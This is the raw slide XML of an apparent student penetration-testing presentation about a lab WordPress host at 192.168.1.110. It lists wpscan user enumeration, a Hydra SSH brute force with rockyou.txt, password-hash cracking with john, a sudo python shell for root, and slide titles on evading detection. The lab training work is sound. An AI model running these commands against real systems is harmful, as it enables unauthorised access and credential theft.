              <a:t>/share/wordlists/rockyou.txt –t 3400 –c 60</a:t>
            </a:r>
            <a:endParaRPr sz="32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5" name="Google Shape;2335;p1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336" name="Google Shape;2336;p1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137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Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2338" name="Google Shape;2338;p137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Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2339" name="Google Shape;2339;p13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Methods Used to Avoiding Detect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" name="Google Shape;234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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2346" name="Google Shape;2346;p138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7" name="Google Shape;2347;p138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39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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2353" name="Google Shape;2353;p139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9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Address Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: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Kali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 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Ubuntu 18.04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Capstone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GNU Linux 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ELK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 192.168.1.110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Debian GNU Linux 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Target1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4" name="Google Shape;2354;p139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55" name="Google Shape;2355;p13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46F90B4E-73E5-406F-A622-D601FD283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310" y="2893877"/>
            <a:ext cx="15450645" cy="95050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61" name="Google Shape;2361;p1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362" name="Google Shape;2362;p140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918138" y="1791547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Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4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 dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2363" name="Google Shape;2363;p140"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2228698349"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1123411" y="2764637"/>
          <a:ext cx="21320625" cy="11390650"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{ED9AA875-E046-443D-A687-EE75BC4A23F7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="710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06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9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32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3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3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WPscan</a:t>
                      </a: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user enumeration</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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wpscan</a:t>
                      </a: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3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http://192.168.1.110/wordpress</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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--enumerate u to find the users Steven and Michael</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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 us to figure out a usernameon wordpress server  in order to run a brute force attack against</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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hydra -l </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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-P</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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r>
                        <a:rPr lang="en-US" sz="3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usr</a:t>
                      </a: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/share/wordlists/rockyou.txt</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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ssh://192.168.1.110 -t 4</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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Uncovered </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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username password</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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Injection</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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opened database using </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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mysql</a:t>
                      </a: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-h </a:t>
                      </a:r>
                      <a:endParaRPr sz="3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localhost -u root -p under </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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3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albe</a:t>
                      </a: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query database to find </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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&amp; steven </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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user_pass</a:t>
                      </a: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hashes. Ran john to find Steven’s password</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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spawn exploitation</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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sudo</a:t>
                      </a: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python -c ‘import </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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pty;pty.spawn</a:t>
                      </a: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(“/bin/bash”);’</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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steven, we were able to run this command in order to escalate to root because python can be executed as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3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sudo</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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6" name="Google Shape;237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4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6</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2378" name="Google Shape;2378;p142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9" name="Google Shape;2379;p14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Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2385" name="Google Shape;2385;p1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386" name="Google Shape;2386;p143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572746" y="1828869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</a:rPr>
              <a:t>Summarize the following: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How did you exploit the vulnerability? E.g., which tool (Nmap, etc.) or technique (XSS, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.)? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> address –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –p- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.1.110 shows is open – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wpscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --enumerate u (shows the 2 users – steven &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>michael</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) – use Hydra –l Michael –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rockyou.txt.ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://192.168.1.110 –t 4 (this will show the password for Michael) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ichael@192.168.1.110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (using hydra password crack) – search directories until you find service.html –cat service.html – flag1 is there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="406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3200" b="1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What did the exploit achieve? E.g., did it grant you a user shell, root access, etc.? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The exploit allowed us to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> into the into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server as Michael. Able to run search the server using commands for flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="406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Include a screenshot or command output illustrating the exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="977900" indent="-5715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4400"/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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --enumerate u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="977900" indent="-5715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4400"/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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra –l Michael –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rockyou.txt.ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://192.168.1.110 –t 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="977900" indent="-5715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4400"/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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Michael@192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="977900" indent="-5715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4400"/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dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-571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dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-571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 panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="4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1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Weak Password &amp; Authentication</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2392" name="Google Shape;2392;p1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93" name="Google Shape;2393;p144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</a:rPr>
              <a:t>Summarize the following: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How did you exploit the vulnerability? E.g., which tool (Nmap, etc.) or technique (XSS, etc.)? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Hydra –l Michael –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rockyou.txt.ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://192.1.110 –t 4 (this will show the password for Michael) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Michael@192.168.1.110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (using hydra password crack) – search directories until you find service.html – cat service.html – flag1 is there</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1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What did the exploit achieve? E.g., did it grant you a user shell, root access, etc.? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The exploit allowed us to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server as Michael. Able to search the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>srver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> using commands for flag</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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Include a screenshot or command output illustrating the exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-571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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra –l Michael –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt ssh://192.168.1.110 –t 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-571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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Michael@192.168.1.110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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2399" name="Google Shape;2399;p1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400" name="Google Shape;2400;p145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</a:rPr>
              <a:t>Summarize the following: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How did you exploit the vulnerability? E.g., which tool (Nmap, etc.) or technique (XSS, etc.)? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After finding stevens password using john, we were able to run a python exploit as steven: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> python –c /’import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty:pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“/bin/bash”);’ run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l in order to see (ALL) NOPASSWD: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/python (we can use python with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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What did the exploit achieve? E.g., did it grant you a user shell, root access, etc.? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit achieved root privileges on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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Include a screenshot or command output illustrating the exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="406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 err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> python –c ‘import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty:pty,spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“/bin/bash”);’</a:t>
            </a:r>
            <a:endParaRPr sz="44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1318</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>127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30" baseType="lpstr">
      <vt:lpstr>Amatic SC</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Poppins Medium</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>2_Custom Design</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Final Engagement Attack, Defense &amp; Analysis of a Vulnerable Network</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Exploits Used </vt:lpstr>
      <vt:lpstr>Exploitation: Brute Force Attack</vt:lpstr>
      <vt:lpstr>Exploitation: Weak Password &amp; Authentication</vt:lpstr>
      <vt:lpstr>Exploitation: Privilege Escalation</vt:lpstr>
      <vt:lpstr>Avoiding Detection </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Weak Password &amp; Authentication</vt:lpstr>
      <vt:lpstr>Stealth Exploitation </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Privelage Ecalation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</dc:title>
  <cp:lastModifiedBy>R.Cameron</cp:lastModifiedBy>
